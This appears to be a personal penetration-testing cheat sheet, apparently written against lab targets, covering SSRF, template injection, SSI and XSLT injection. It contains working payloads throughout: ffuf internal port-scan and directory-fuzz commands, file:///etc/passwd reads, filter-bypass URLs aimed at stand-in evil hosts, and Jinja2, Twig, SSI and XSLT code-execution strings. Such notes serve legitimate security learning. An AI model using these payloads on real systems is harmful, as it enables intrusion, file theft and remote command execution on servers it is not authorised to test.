Search ...
Server-side Request Forgery (SSRF)
If a server retrieves resources based on user input like an url it can lead to the server making unintended requests
With SSRF its possible to make request to unintended locations like
http://127.0.0.1 Several URL schemes can be used:Example of SSRF request
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
stockApi=http://localhost/adminNow it will accces the /admin page locally but the request is made by the local machine which is granted admin access.
http://andhttps://: Fetches content viahttp/srequests leading to acces to internal network.file://Used to read local files on web servergopher://Send http posts requests with payloads databases or email.
Look for parameters that passes URL's and try changing those own listener or internal network like
http://127.0.0.1/index.php.Back-end systems
Its possible the application server can interact with back-end systems and other systems inside the network, that usually have non-routable IP addresses,
Its possible the application server can interact with back-end systems and other systems inside the network, that usually have non-routable IP addresses,
10.x.x.x, 192.168.x.x, 172.16.x.x. Within range we can fuzz these IPs to see if anything is running on a IP address.Port scan
Based on differences of response of a request we can conduct a port scan.
Based on differences of response of a request we can conduct a port scan.
ffuf -w ./ports.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://127.0.0.1:FUZZ/&date=2024-01-02" -fr "Failed to connect to"Brute force directories
Look at data in the request
Look at data in the request
-d "dateserver=http://dateserver.htb/FUZZ.php&date=2024-01-01" . Fuzzing .php pages.ffuf -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://dateserver.htb/FUZZ.php&date=2024-01-01" -fr "Server at dateserver.htb Port 80"Local File Inclusion (LFI)
In the data payload use file://
In the data payload use file://
-d "dateserver=file:///etc/passwd&date=2024-01-01" Blind SSRF
If we cannot see the response and there is a SSRF vulnerbality its called a bilnd SSRF vulnerability. Netcat listener can confirm for a vuln.
If we cannot see the response and there is a SSRF vulnerbality its called a bilnd SSRF vulnerability. Netcat listener can confirm for a vuln.
Bypassing SSRF Defenses
There are black-list filters that can block hostnames like
127.0.0.1 and localhost. To bypass:- Use another IP value for
127.0.0.1like2130706433,017700000001, or127.1 - Register your own domain name that resolves to
127.0.0.1 - Obfuscate the address using URL encoding or using cases.
- Try different schemes.
White-list Filters
White-list filters is a list which only accepts predefined values, which is a lot safer than black-list filters. Like embedding credentials.
<!--Embed credentials using the @ char-->
https://expected-host:fakepassword@evil-host
<!--Use the # char, used to jump to other section in page-->
https://evil-host#expected-host
<!--Add the target as subdomain-->
https://expected-host.evil-hostOpen redirect SSRF filter byass
Open redirect is where the application will redirect users to an user provided URL, for examle
/products/new/id=6&path=http://evil.xyzLeverage this to bypass the URL filter and access the internal admin page.
/products/new/id=6&path=http://192.168.0.68/adminBlind SSRF vulnerabilities
If we do not get any data back in the response SSRF is still possible but its called Blind SSRF. The easiest way to discover these are with out-of-band techniques. Either using interactsh or Burp collaborator can be used. In short we can feed the application a url and wait for a DNS look-up on our server.
The Referer header is often a useful attack surface for SSRF vulnerabilities.
Server-side Template Injection or SSTI
SSTI occurs when user input is inserted into the template itself before rendering, allowing code execution. Like with SQL we can identify vulnerabilities using:
{{7*7}}
{{7*'7'}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
Find payloads:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Python.md
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Python.md
Local File Inclusion (LFI) Jinja2
{{ self.__init__.__globals__.__builtins__.open("/etc/passwd").read() }}Remote Code Executino (RCE) Jinja2
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}Local File Inclusion (LFI) Twig
{{ "/etc/passwd"|file_excerpt(1,-1) }}Remote Code Executino (RCE) Twig
{{ ['id'] | filter('system') }}SSI Injection
Server-Side Includes (SSI) is used by webapps to create dynamic content on HTML pages. The use of SSI can be found if files are used:
.shtml.shtm.stm
SSI uses directives consisting of:
name: the directive's nameparameter name: one or more parametersvalue: one or more parameter values
Several payloads
<!--#printenv -->
<!--#name param1="value1" param2="value" -->
<!--#exec cmd="whoami" -->XSLT Injections
eXtensible Stylesheet Language Transformation (XSLT) can select specific nodes from an XML document and change the XML structure.
# LFI
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />
<xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />
# RCE
<xsl:value-of select="php:function('system','id')" />